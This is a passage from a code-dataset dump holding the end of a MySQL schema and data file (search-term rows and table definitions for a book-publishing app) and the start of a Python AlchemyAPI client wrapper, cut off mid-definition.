''),\n('cb85479c-eb1e-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('47c777f8-eb1f-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('7e79d638-eb1f-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('a0fa3374-eb1f-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('6a71f1dc-eb21-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('14edcdc4-eb23-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('e4e14ab0-eb23-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('0cdf61be-eb24-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('aaefebf8-eb24-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('cdb89a72-eb24-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('d56e337e-eb26-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('ce5aaf04-ec20-11e2-acfa-12313d015d04', 'Tactics', ''),\n('39f4146e-edaa-11e2-b163-12313d015d04', 'Chalupas', ''),\n('47e2725a-edaa-11e2-9315-12313d015d04', 'Chalupas', ''),\n('d0b171bc-edaa-11e2-a0cf-12313d015d04', 'Chalupas', ''),\n('6ae12da2-edad-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('7553e46e-edad-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('8ec912fc-edad-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('8129aebc-edae-11e2-a744-12313d015d04', 'Chalupas', ''),\n('897f52a6-edae-11e2-99f4-12313d015d04', 'Chalupas', ''),\n('813f750e-edbc-11e2-a90b-12313d015d04', 'Chalupas', ''),\n('b3b22c0c-edbc-11e2-b926-12313d015d04', 'Legge', ''),\n('5ec0aca0-ee70-11e2-b711-12313d015d04', 'Cicco Produttivo', ''),\n('8a21abba-ee70-11e2-8df6-12313d015d04', 'Conciliazone', ''),\n('c451a9a2-ee70-11e2-ace7-12313d015d04', 'Conciliazione', ''),\n('6bfa3bda-ee74-11e2-ab35-12313d015d04', 'Conciliazione', ''),\n('82e56efa-ef14-11e2-8ecb-12313d015d04', 'Chalupas', ''),\n('c087d3aa-ef15-11e2-90d2-12313d015d04', 'Kaputt', ''),\n('2b26529a-ef16-11e2-a2c6-12313d015d04', 'Kaputt', ''),\n('b394c1d4-ef16-11e2-9937-12313d015d04', 'Curzio Malaparte', ''),\n('f6e5d78e-ef16-11e2-8d09-12313d015d04', 'Curzio Malaparte', ''),\n('1f446178-ef17-11e2-833f-12313d015d04', 'Curzio Malaparte', ''),\n('75302e6a-ef3e-11e2-994c-12313d015d04', 'Deimos', ''),\n('ba110242-ef44-11e2-a083-12313d015d04', 'Deimos', ''),\n('c526d6b6-ef44-11e2-a091-12313d015d04', 'Chalupas', ''),\n('19dcee24-efe1-11e2-94df-12313d015d04', 'Kaputt', ''),\n('539454ae-efe1-11e2-a5a2-12313d015d04', 'Kaputt', ''),\n('1e1a114a-efe3-11e2-b41a-12313d015d04', 'Kaputt', ''),\n('768cf3da-f09f-11e2-acfa-12313d015d04', 'Diels-Alder reaction', ''),\n('eb760c5c-f0a1-11e2-a41f-12313d015d04', 'Kaputt', ''),\n('0627c0d8-f0a5-11e2-8b4b-12313d015d04', 'Kaputt', ''),\n('0c2b1002-f0a5-11e2-9c3d-12313d015d04', 'Kaputt', ''),\n('8780cc92-f0a5-11e2-aade-12313d015d04', 'Kaputt', ''),\n('a953bbae-f0a5-11e2-a538-12313d015d04', 'Kaputt', ''),\n('24496ecc-f0aa-11e2-b1c0-12313d015d04', 'Kaputt', ''),\n('476fca4c-f0cb-11e2-b4d2-12313d015d04', 'Kaputt', ''),\n('7fd662aa-f0cc-11e2-b39a-12313d015d04', 'Kaputt', ''),\n('3572ea8e-f0cd-11e2-bc22-12313d015d04', 'Kaputt', ''),\n('da923560-f0cd-11e2-bdd6-12313d015d04', 'Kaputt', ''),\n('8d977efa-f0d2-11e2-940f-12313d015d04', 'Kaputt', ''),\n('cc576326-f0d2-11e2-a3f9-12313d015d04', 'Kaputt', ''),\n('5a6ef564-f0d5-11e2-b002-12313d015d04', 'Chalupas', ''),\n('530b4edc-f0d8-11e2-9af3-12313d015d04', 'Chalupas', ''),\n('8407289e-f0d8-11e2-9c80-12313d015d04', 'Chalupas', ''),\n('6b6e419a-f0d9-11e2-a112-12313d015d04', 'Chalupas', ''),\n('22b3dacc-f0da-11e2-9925-12313d015d04', 'Chalupas', ''),\n('ee27c1d2-f189-11e2-a7bc-12313d015d04', 'Diels-Alder Reaction', ''),\n('5fe4763a-f94b-11e2-8d42-12313d015d04', 'Methane', ''),\n('4532900c-f94f-11e2-8de4-12313d015d04', 'Methane', ''),\n('93691154-f951-11e2-99e1-12313d015d04', 'Sciamachy', ''),\n('0e40064c-fafd-11e2-9bb9-12313d015d04', 'Seney', ''),\n('124cc3ac-fb01-11e2-8df3-12313d015d04', 'Seney', ''),\n('57e01e48-fb09-11e2-81a0-12313d015d04', 'Seney', ''),\n('0f1e81d0-fb0a-11e2-8aa1-12313d015d04', 'Seney', ''),\n('6b6aaf68-fb0a-11e2-921b-12313d015d04', 'Seney', ''),\n('8485be10-fb0b-11e2-84c5-12313d015d04', 'Seney', ''),\n('921eab68-fb0b-11e2-83e2-12313d015d04', 'Seney', ''),\n('e0d5f982-fb0b-11e2-a6fb-12313d015d04', 'Seney', ''),\n('96637e5c-0131-11e3-9af4-12313d015d04', 'chalupa', ''),\n('ad0f2662-0206-11e3-949c-12313d015d04', 'optical rectifier', ''),\n('b406dbfe-0206-11e3-9dc0-12313d015d04', 'Seney', ''),\n('eb89ab42-0206-11e3-aef5-12313d015d04', 'Chalupas', ''),\n('b674730e-0208-11e3-9ad9-12313d015d04', 'no', ''),\n('e8af38f4-0208-11e3-96cc-12313d015d04', 'no', ''),\n('b2136b6a-020a-11e3-a5aa-12313d015d04', 'no', ''),\n('d073396e-020a-11e3-88a2-12313d015d04', 'no', ''),\n('3521b690-020d-11e3-83e2-12313d015d04', 'Chalupas', ''),\n('91e67536-020e-11e3-b7b4-12313d015d04', 'Quora', ''),\n('90e3233e-0211-11e3-bf0a-12313d015d04', 'climate engineering', ''),\n('db70e972-02cf-11e3-beae-12313d015d04', 'climate engineering', ''),\n('447aa7c2-02d1-11e3-96f1-12313d015d04', 'Advise & Consent', ''),\n('4dc81cb2-02d9-11e3-b25e-12313d015d04', 'Chalpuas', ''),\n('f41c6cdc-02e6-11e3-acfa-12313d015d04', 'efflorescence', ''),\n('610cbc6e-0424-11e3-8b1b-12313d015d04', 'efflorescence', ''),\n('53d9afd6-0431-11e3-acc8-12313d16658b', 'efflorescence', ''),\n('adf6eda2-046e-11e3-8be4-12313d16658b', 'chalupas', ''),\n('a66eda1c-046f-11e3-a7e0-12313d16658b', 'chalupas', ''),\n('df7eb4d4-0470-11e3-a4f1-12313d16658b', 'chalupas', ''),\n('c921d6f2-0471-11e3-b5eb-12313d16658b', 'crontab', ''),\n('e9957042-0471-11e3-8944-12313d16658b', 'Wyoming', ''),\n('fd922934-0474-11e3-b26a-12313d16658b', 'Nook', ''),\n('3bb93e1c-0477-11e3-9f8d-12313d16658b', 'chalupas', ''),\n('ed313c66-0513-11e3-84b4-12313d16658b', 'KISS', ''),\n('8e84d70c-0524-11e3-98cb-12313d16658b', 'ChromeCast', ''),\n('5c85ba2e-0541-11e3-a312-12313d16658b', 'NCIS LA', ''),\n('67d6a754-059f-11e3-bcf9-12313d16658b', 'Information integration', ''),\n('4d3096f0-05de-11e3-8daf-12313d16658b', 'LexisNexis', ''),\n('add587b4-05e2-11e3-89c3-12313d16658b', 'Information Integration', ''),\n('b0559618-06dd-11e3-9fcf-12313d16658b', 'Kim Kardashian', ''),\n('70d6714a-0c07-11e3-a01a-12313d16658b', 'chalupas', ''),\n('0839b470-0c08-11e3-b372-12313d16658b', 'Territory', ''),\n('a5912a8e-0c24-11e3-96f8-12313d16658b', 'Seleucid', ''),\n('ad59ef8e-0c2a-11e3-83b5-12313d16658b', 'Calibre', ''),\n('b5991f0c-0ce9-11e3-ae28-12313d16658b', 'Clusium', ''),\n('3c3632a2-0db7-11e3-84cd-12313d16658b', 'Clusium', ''),\n('f191c688-0de0-11e3-8ade-12313d16658b', 'Maccabees', ''),\n('75e912b4-0e69-11e3-a756-12313d16658b', 'C3 plants', ''),\n('657cc790-0e73-11e3-8912-12313d16658b', 'CAM photosynthesis', ''),\n('ae7b530e-0e77-11e3-a710-12313d16658b', 'Chalupas', ''),\n('13fc1f5e-0e7a-11e3-b56c-12313d16658b', 'CAM photosynthesis', ''),\n('6c978d88-0e7a-11e3-a642-12313d16658b', 'Chalupas', ''),\n('d6c1cd72-0e7a-11e3-8991-12313d16658b', 'C4 plant', ''),\n('b8caf7d4-0e7b-11e3-91b7-12313d16658b', 'Torpedo Boat', ''),\n('061586c6-0e7c-11e3-b63f-12313d16658b', 'Julian Assange', ''),\n('58923d90-0e7c-11e3-b1f3-12313d16658b', 'Bradley Manning', ''),\n('c40c030c-0e7d-11e3-b1a8-12313d16658b', 'Calvary Chapel', ''),\n('0677a448-0e7f-11e3-8290-12313d16658b', 'Steve Ballmer', ''),\n('79acfd98-0e82-11e3-823e-12313d16658b', 'Boris Johnson', ''),\n('d2b08eb8-0e83-11e3-89e2-12313d16658b', 'Magento', ''),\n('9eaf03a0-0e84-11e3-acfa-12313d16658b', 'Benny Hill', ''),\n('b2090778-0e86-11e3-8b78-12313d16658b', 'Calais', ''),\n('b6c40d3a-0e86-11e3-94a0-12313d16658b', 'Chalupas', ''),\n('e3e7dd4a-0e87-11e3-8496-12313d16658b', 'Paula Patton', ''),\n('9ddd65fe-0f45-11e3-8c03-12313d16658b', 'Robots', ''),\n('e2e23ff8-14a9-11e3-92e5-12313d16658b', 'red line', ''),\n('6bebd944-14aa-11e3-8a0a-12313d16658b', 'prophet Agabus', ''),\n('ca5d05fc-14aa-11e3-ad2a-12313d16658b', 'Agabus', ''),\n('b54288b2-14b0-11e3-b1be-12313d16658b', 'red line', ''),\n('8d4c1a62-14c9-11e3-9e42-12313d16658b', 'low carbon', ''),\n('a15374b8-14fd-11e3-b116-12313d16658b', 'chalupas', ''),\n('0294d38e-14fe-11e3-acf3-12313d16658b', 'endymion', ''),\n('20cd8814-1562-11e3-a9b7-12313d16658b', 'water security', ''),\n('d186ee2e-1563-11e3-9940-12313d16658b', 'text analytics', ''),\n('a30e584c-1564-11e3-ad8c-12313d16658b', 'Syrian Liberation Army', ''),\n('84e5ba7e-1567-11e3-9c02-12313d16658b', 'Steve Ballmer', ''),\n('b29f4e48-156d-11e3-8858-12313d16658b', 'Steven A. Ross', ''),\n('527b6974-156e-11e3-b6e9-12313d16658b', 'Bar Mitzvah', ''),\n('94528e4c-1571-11e3-938e-12313d16658b', 'Bat Mitzvah', ''),\n('e3873950-1575-11e3-9dd4-12313d16658b', 'Der Spiegel', ''),\n('2540315a-1579-11e3-8fd8-12313d16658b', 'sarin', ''),\n('6c0f96e8-1579-11e3-8659-12313d16658b', 'Howard Dean', ''),\n('d00753f6-157a-11e3-a950-12313d16658b', 'combinatorics', ''),\n('294c743c-157b-11e3-a212-12313d16658b', 'Bionic Woman', ''),\n('c090c1a2-157d-11e3-a31b-12313d16658b', 'Matrix Algebra', ''),\n('1d898696-157e-11e3-b1c5-12313d16658b', 'Quora', ''),\n('80261bb6-157e-11e3-abb1-12313d16658b', 'chalupas', ''),\n('730d28ec-157f-11e3-bc99-12313d16658b', 'Tuvalu', ''),\n('a8800602-157f-11e3-b158-12313d16658b', 'chalupas', ''),\n('fc3dac88-1582-11e3-bd23-12313d16658b', 'Black Swan', ''),\n('6ee8e7b4-1585-11e3-93cc-12313d16658b', 'Patrician', ''),\n('b86bf542-1586-11e3-8488-12313d16658b', 'Red Dawn', ''),\n('ab191720-1587-11e3-8b07-12313d16658b', 'Edward Snowden', ''),\n('d6ad394e-15a4-11e3-84a9-12313d16658b', 'Old Navy', ''),\n('5c30595e-15cb-11e3-8655-12313d16658b', 'Seleucid', ''),\n('75c15dbe-15cb-11e3-9bab-12313d16658b', 'Seleucid', ''),\n('e2625f62-15cc-11e3-8a6a-12313d16658b', 'Chalupas', ''),\n('5bb8453e-15cd-11e3-bef3-12313d16658b', 'chalupas', ''),\n('1cc64aa0-162d-11e3-ad59-12313d16658b', 'Neville Chamberlain', ''),\n('5b5df91a-162e-11e3-a740-12313d16658b', 'Neville Chamberlain', ''),\n('525aa920-162f-11e3-84da-12313d16658b', 'Arxiv', ''),\n('1cacba60-1630-11e3-a023-12313d16658b', 'Chalupas', ''),\n('4317d91e-1630-11e3-aa66-12313d16658b', 'Duct tape', ''),\n('bf72deac-1633-11e3-ba6a-12313d16658b', 'Anthony Weiner', ''),\n('5bf56ffa-1635-11e3-a816-12313d16658b', 'Geoengineering', ''),\n('121e682c-1636-11e3-b1fc-12313d16658b', 'Sunflower', ''),\n('223f3488-1637-11e3-855e-12313d16658b', 'AFRICOM', ''),\n('d286e5ac-1637-11e3-89ac-12313d16658b', 'AFRICOM', ''),\n('e251dba8-1638-11e3-b177-12313d16658b', 'Jamie Oliver', ''),\n('2bf9df0c-163a-11e3-860d-12313d16658b', 'Samantha Power', ''),\n('d5614634-163a-11e3-a917-12313d16658b', 'Neville Chamberlain', ''),\n('3f5be490-163b-11e3-9d57-12313d16658b', 'chalupas', ''),\n('ac2c1080-163c-11e3-a017-12313d16658b', 'Glutamate', ''),\n('3e139486-1652-11e3-8773-12313d16658b', 'Arctic Fox', ''),\n('8776000a-1652-11e3-9b97-12313d16658b', 'chalupas', ''),\n('9d885784-1653-11e3-82f9-12313d16658b', 'chalupas', ''),\n('01b10e40-1654-11e3-b7af-12313d16658b', 'chalupas', ''),\n('415323e4-1654-11e3-9fc2-12313d16658b', 'Arctic Fox', ''),\n('377e725a-1655-11e3-bf12-12313d16658b', 'Arctic Fox', ''),\n('503b0068-1657-11e3-9da4-12313d16658b', 'Chalupas', ''),\n('df5c1480-1657-11e3-9b5f-12313d16658b', 'Chalupas', ''),\n('447a6446-165a-11e3-90be-12313d16658b', 'Maersk Line', ''),\n('7181187e-168f-11e3-bd25-12313d16658b', 'GCHQ', ''),\n('30ce583e-1719-11e3-b78f-12313d16658b', 'diritto canonico', ''),\n('46f7094e-1719-11e3-9843-12313d16658b', 'diritto canonico', ''),\n('5ccb4b4a-1719-11e3-868d-12313d16658b', 'canonico', ''),\n('8aee4b76-1719-11e3-aaa1-12313d16658b', 'canonico', ''),\n('37826cd2-171a-11e3-a056-12313d16658b', 'diritto canonico', ''),\n('0339d360-1734-11e3-ba29-12313d16658b', 'diritto canonico', ''),\n('7bab5da0-1734-11e3-b4c2-12313d16658b', 'diritto canonico', ''),\n('cfccb490-1975-11e3-ae48-12313d16658b', 'विशिष्ट आपेक्षिकता सिद्धांत', ''),\n('17085cd2-1977-11e3-be70-12313d16658b', 'गैलीलियो गैलिली', ''),\n('25d19378-1977-11e3-885c-12313d16658b', '........ ......', ''),\n('4f658d3e-1a17-11e3-9175-12313d16658b', 'Checkmate', ''),\n('b60d6b2c-1a6e-11e3-a5e9-12313d16658b', 'battle of harlaw', ''),\n('116afd58-1a70-11e3-b063-12313d16658b', 'Adler', ''),\n('65e8e300-1b0a-11e3-9080-12313d16658b', 'Flight 93', ''),\n('73c0760e-1b0b-11e3-ad38-12313d16658b', 'chalupas', ''),\n('49d7b568-1b0c-11e3-ab8a-12313d16658b', 'Deimos', ''),\n('00b35b34-1b0d-11e3-b97d-12313d16658b', 'Deimos', ''),\n('427403ca-1b0d-11e3-8923-12313d16658b', 'Chalupas', ''),\n('79ad0a08-1b0d-11e3-9c59-12313d16658b', 'Deimos', ''),\n('b33ee154-1b14-11e3-9cda-12313d16658b', 'Algorithm', ''),\n('bf3a56b8-1b15-11e3-bdd2-12313d16658b', 'Chalupas', ''),\n('b4559a4a-1b16-11e3-9bf4-12313d16658b', 'Chalupas', ''),\n('ff8b5e90-1b17-11e3-8179-12313d16658b', 'Dublin Core', ''),\n('0a15d560-1b19-11e3-bae6-12313d16658b', 'Dublin Core', ''),\n('5eb9b0aa-1b1e-11e3-b39a-12313d16658b', 'Dublin Core', ''),\n('8827481c-1b1e-11e3-9013-12313d16658b', 'Dublin Core', ''),\n('9c4a4ac6-1b3f-11e3-9178-12313d16658b', 'Vulpes', ''),\n('07decd90-1bc0-11e3-8fcb-12313d16658b', 'Vladimir Putin', ''),\n('9bf73c0e-1bc2-11e3-a932-12313d16658b', 'Vyazma', ''),\n('635500d8-1bc3-11e3-aaeb-12313d16658b', 'Newt Scamander', ''),\n('97bdf634-1bc5-11e3-8c56-12313d16658b', 'Fantastic Beasts', ''),\n('f32c58d2-1be6-11e3-ae92-12313d16658b', 'Rinaldo e Armida', ''),\n('997d36d4-1be7-11e3-b475-12313d16658b', 'Rinaldo', ''),\n('6791b932-1be8-11e3-9e05-12313d16658b', 'Rinaldo', ''),\n('51bcec7a-1be9-11e3-911a-12313d16658b', 'Vermeer Malkunst', ''),\n('57a47b58-1be9-11e3-b989-12313d16658b', 'Rinaldo', ''),\n('68151d1c-1be9-11e3-8934-12313d16658b', 'Vermeer Malkunst', ''),\n('76b8391c-1be9-11e3-b002-12313d16658b', 'Malkunst', ''),\n('ee0c06a2-1c3d-11e3-b33f-12313d16658b', 'BLfBRJMTeAiESQBYjM', ''),\n('d024839e-216a-11e3-bb93-12313d16658b', 'how to gain traffic on a blog', ''),\n('a99e8eba-2221-11e3-9441-12313d16658b', 'blog traffic', ''),\n('f7867468-2239-11e3-a757-12313d16658b', 'Dogfooding', ''),\n('d7a04c0a-226b-11e3-b594-12313d16658b', 'HgJrzLuR', ''),\n('5e49c96a-23e4-11e3-a255-12313d16658b', 'diy superannuation', ''),\n('4bbbf35a-2492-11e3-81ea-12313d16658b', 'Ignatz', ''),\n('f095ff5c-24af-11e3-94e5-12313d16658b', 'diy superannuation', ''),\n('f8359498-24af-11e3-a6d8-12313d16658b', 'superannuation', ''),\n('c9fdbd34-253c-11e3-a605-12313d16658b', 'Younger Dryas', ''),\n('593fcd2c-260d-11e3-acc9-12313d16658b', 'Unified messaging communications', ''),\n('dab602ae-260d-11e3-9109-12313d16658b', 'Unified messaging communications', ''),\n('e002852a-260d-11e3-a267-12313d16658b', 'Unified messaging', ''),\n('bf2fa53c-2610-11e3-8726-12313d16658b', 'Dogfooding', ''),\n('c5fde37e-2610-11e3-bdc6-12313d16658b', 'HgJrzLuR', ''),\n('d744c3f0-2610-11e3-a337-12313d16658b', 'Younger Dryas', ''),\n('dd180a62-2610-11e3-b974-12313d16658b', 'Ignatz', ''),\n('e07e4234-2610-11e3-b653-12313d16658b', 'diy superannuation', ''),\n('343121ca-278e-11e3-9564-12313d16658b', 'Putin', ''),\n('0773015a-2791-11e3-97b5-12313d16658b', 'Madrassa', ''),\n('0e956c10-2792-11e3-aca2-12313d16658b', 'NCIS LA', ''),\n('597f692e-2797-11e3-8e54-12313d16658b', 'Chalupas', ''),\n('34d2d312-2798-11e3-b096-12313d16658b', 'Chalupas', ''),\n('2355f8a2-2799-11e3-a8e1-12313d16658b', 'Chalupas', ''),\n('866d81bc-2799-11e3-927b-12313d16658b', 'Chalupas', ''),\n('818a2cda-279a-11e3-a9f2-12313d16658b', 'Chalupas', ''),\n('4e4cec68-27ae-11e3-b0fc-12313d16658b', 'nano delivery systems for neutraceuticles', ''),\n('eeb708ae-27fa-11e3-9018-12313d16658b', 'DbfxOzuuuFVpo', ''),\n('0d60f030-28a0-11e3-a325-12313d16658b', 'neutraceuticals', ''),\n('a5d05428-29d1-11e3-be8a-12313d16658b', 'methane clathrate', ''),\n('da736336-29eb-11e3-8eb4-12313d16658b', 'neutraceuticals', ''),\n('4c437428-29ed-11e3-84ec-12313d16658b', 'neutraceuticals', ''),\n('41c6cfa2-29ef-11e3-8fa7-12313d16658b', 'chalupas', ''),\n('aac7b200-29ef-11e3-b5d9-12313d16658b', 'neutraceuticals', ''),\n('6b99380a-29f0-11e3-8d19-12313d16658b', 'neutraceuticals', ''),\n('cec5d990-29f2-11e3-a1df-12313d16658b', 'neutraceuticals', ''),\n('12e27f66-29f3-11e3-8a48-12313d16658b', 'neutraceuticals', ''),\n('3bd362e6-29f3-11e3-ae2e-12313d16658b', 'neutraceuticals', ''),\n('dc12aa46-29f3-11e3-aa09-12313d16658b', 'neutraceuticals', ''),\n('07bb02be-29f5-11e3-80c1-12313d16658b', 'neutraceuticals', ''),\n('b34e6b84-29f5-11e3-bd52-12313d16658b', 'root canal', ''),\n('18567fd0-29f6-11e3-9929-12313d16658b', 'root canal', ''),\n('688804c4-29fb-11e3-9cb2-12313d16658b', 'Maruquesas', ''),\n('705b31bc-29fb-11e3-a106-12313d16658b', 'Ruratoa', ''),\n('75f9c0ac-29fb-11e3-9137-12313d16658b', 'New Caledonia', ''),\n('33269646-29fc-11e3-bc06-12313d16658b', 'rorqual', ''),\n('af4dc49c-29fc-11e3-bcc5-12313d16658b', 'narwhal', ''),\n('300dff60-29fe-11e3-8355-12313d16658b', 'narwhal', ''),\n('e3efb866-29fe-11e3-876a-12313d16658b', 'Narwhal', ''),\n('4c1fdb54-2a00-11e3-8c6e-12313d16658b', 'Narwhal', ''),\n('510983da-2a01-11e3-9f81-12313d16658b', 'narwhal', ''),\n('c1cdf268-2a01-11e3-a0bd-12313d16658b', 'narwhal', ''),\n('372c7002-2a02-11e3-b3fd-12313d16658b', 'narwhal', ''),\n('bd81a026-2a13-11e3-8b18-12313d16658b', 'root canal', ''),\n('2da93806-2a72-11e3-a2c9-12313d16658b', 'Leadership New Zealand', ''),\n('151c5174-2ab3-11e3-81e0-12313d16658b', 'no', ''),\n('026cd5c0-2ab4-11e3-b089-12313d16658b', 'Vulpes', ''),\n('3ba636e2-2ab4-11e3-92a1-12313d16658b', 'Chalupas', ''),\n('1750a83e-2abb-11e3-8da7-12313d16658b', 'Chalupas', ''),\n('69ac8670-2abb-11e3-be4d-12313d16658b', 'Chalupas', ''),\n('385fea84-2d46-11e3-976b-12313d16658b', 'cheap special occasion dress', ''),\n('d93bb9a4-2d7f-11e3-b108-12313d16658b', 'rNImjneBvdE', ''),\n('bdee9f36-2f69-11e3-92ef-12313d16658b', 'san diego chargers jersey', ''),\n('bb64edcc-3001-11e3-8dbc-12313d16658b', 'canada goose camrose parka sale', ''),\n('36a59cd0-3673-11e3-9414-12313d16658b', 'English Language', ''),\n('3db3808c-3673-11e3-91e7-12313d16658b', 'Prisoners of War', ''),\n('c5cfa3a0-3b83-11e3-9931-12313d16658b', 'Chalupas', ''),\n('36c75cc4-3b84-11e3-b800-12313d16658b', 'Chalupas', ''),\n('2ef6f676-3c47-11e3-8e23-12313d16658b', 'Chalupas', '');\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `skus`\n--\n\nCREATE TABLE IF NOT EXISTS `skus` (\n `sku` bigint(20) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`sku`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `standalone_print_cover_builds`\n--\n\nCREATE TABLE IF NOT EXISTS `standalone_print_cover_builds` (\n `ISBN` mediumtext NOT NULL,\n `covertitle` mediumtext NOT NULL,\n `shorttitle` mediumtext NOT NULL,\n `editedby` mediumtext NOT NULL,\n `spinepixels` int(11) NOT NULL,\n `covercolor` mediumtext NOT NULL,\n `coverfontcolor` mediumtext NOT NULL,\n `coverfont` mediumtext NOT NULL,\n `submitted_to_LSI` tinyint(1) NOT NULL DEFAULT '0',\n `uuid` mediumtext NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='to track cover build jobs';\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `user_credits`\n--\n\nCREATE TABLE IF NOT EXISTS `user_credits` (\n `user_id` int(11) NOT NULL AUTO_INCREMENT,\n `user_points_initial` int(11) NOT NULL,\n `user_points_now` int(11) NOT NULL,\n PRIMARY KEY (`user_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n" }, { "alpha_fraction": 0.6784966588020325, "alphanum_fraction": 0.6803678870201111, "avg_line_length": 35.78996658325195, "blob_id": "69de0a5fcd7e893e5c8bb1159587afe50436028f", "content_id": "e9a742de5e4c5ecb4af817e2d1400128d9c21a05", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31530, "license_type": "permissive", "max_line_length": 98, "num_lines": 857, "path": "/scripts/includes/AlchemyAPI.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\nimport urllib.request, urllib.parse, urllib.error\nimport sys\n\nfrom xml.etree import ElementTree as etree\n\nclass AlchemyAPI_Params(object):\n _url = \"\"\n _html = \"\"\n _text = \"\"\n _outputMode = \"\"\n _customParameters = \"\"\n def getUrl(self):\n return self._url\n def setUrl(self, url):\n self._url = url\n def getHtml(self):\n return self._html\n def setHtml(self, html):\n self._html = html\n def getText(self):\n return self._text\n def setText(self, text):\n self._text = text\n def getOutputMode(self):\n return self._mode\n def setOutputMode(self, mode):\n if mode != \"xml\":\n raise Exception('Error setting output mode.')\n self._outputMode = mode\n def getCustomParameters(self):\n return self._customParameters\n def setCustomParameters(self, *values):\n self._customParameters = \"\"\n for i in len(values):\n self._customParameters += \"&\" + values[i] + \"=\" + urllib.parse.quote(values[i + 1])\n i = i + 1\n def getParameterString(self):\n retString = \"\"\n if self._url != \"\":\n retString += \"&url=\" + urllib.parse.quote(self._url)\n if self._html != \"\":\n retString += \"&html=\" + urllib.parse.quote(self._html)\n if self._text != \"\":\n retString += \"&text=\" + urllib.parse.quote(self._text)\n if self._outputMode != \"\":\n retString += \"&outputMode=\" + urllib.parse.quote(self._outputMode)\n if self._customParameters != \"\":\n retString += self._customParameters\n return retString\n\n\nclass AlchemyAPI_NamedEntityParams(AlchemyAPI_Params):\n _disambiguate = \"\"\n _linkedData = \"\"\n _coreference = \"\"\n _quotations = \"\"\n _sourceText = \"\"\n _showSourceText = \"\"\n _maxRetrieve = \"\"\n _baseUrl = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n _sentiment = \"\"\n def getDisambiguate(self):\n return self._disambiguate\n def setDisambiguate(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Disambiguate.')\n self._disambiguate = setting\n def getLinkedData(self):\n return self._linkedData\n def setLinkedData(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting LinkedData.')\n self._linkedData = setting\n def getCoreference(self):\n return self._coreference\n def setCoreference(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Coreference.')\n self._coreference = setting\n def getQuotations(self):\n return self._quotations\n def setQuotations(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Quotations.')\n self._quotations = setting\n def getShowSourceText(self):\n return self._showSourceText\n def setShowSourceText(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting ShowSourceText.')\n self._showSourceText = setting\n def getSourceText(self):\n return self._quotations\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cleaned':\n if setting != 'raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getMaxRetrieve(self):\n return self._maxRetrieve\n def setMaxRetrieve(self, setting):\n self._maxRetrieve = setting\n def getBaseUrl(self):\n return self._baseUrl\n def setBaseUrl(self, setting):\n self._baseUrl = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getSentiment(self):\n return self._sentiment\n def setSentiment(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Sentiment.')\n self._sentiment = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_NamedEntityParams, self).getParameterString()\n if self._disambiguate != \"\":\n retString += \"&disambiguate=\" + str(self._disambiguate)\n if self._linkedData != \"\":\n retString += \"&linkedData=\" + str(self._linkedData)\n if self._coreference != \"\":\n retString += \"&coreference=\" + str(self._coreference)\n if self._quotations != \"\":\n retString += \"&quotations=\" + str(self._quotations)\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._showSourceText != \"\":\n retString += \"&showSourceText=\" + str(self._showSourceText)\n if self._maxRetrieve != \"\":\n retString += \"&maxRetrieve=\" + str(self._maxRetrieve)\n if self._baseUrl != \"\":\n retString += \"&baseUrl=\" + urllib.parse.quote(self._baseUrl)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n if self._sentiment != \"\":\n retString += \"&sentiment=\" + str(self._sentiment)\n return retString\n\n\nclass AlchemyAPI_CategoryParams(AlchemyAPI_Params):\n _sourceText = \"\"\n _baseUrl = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n def getSourceText(self):\n return self._quotations\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getBaseUrl(self):\n return self._baseUrl\n def setBaseUrl(self, setting):\n self._baseUrl = setting\n def getConstraintQuery(self):\n return self._cQuery\n def 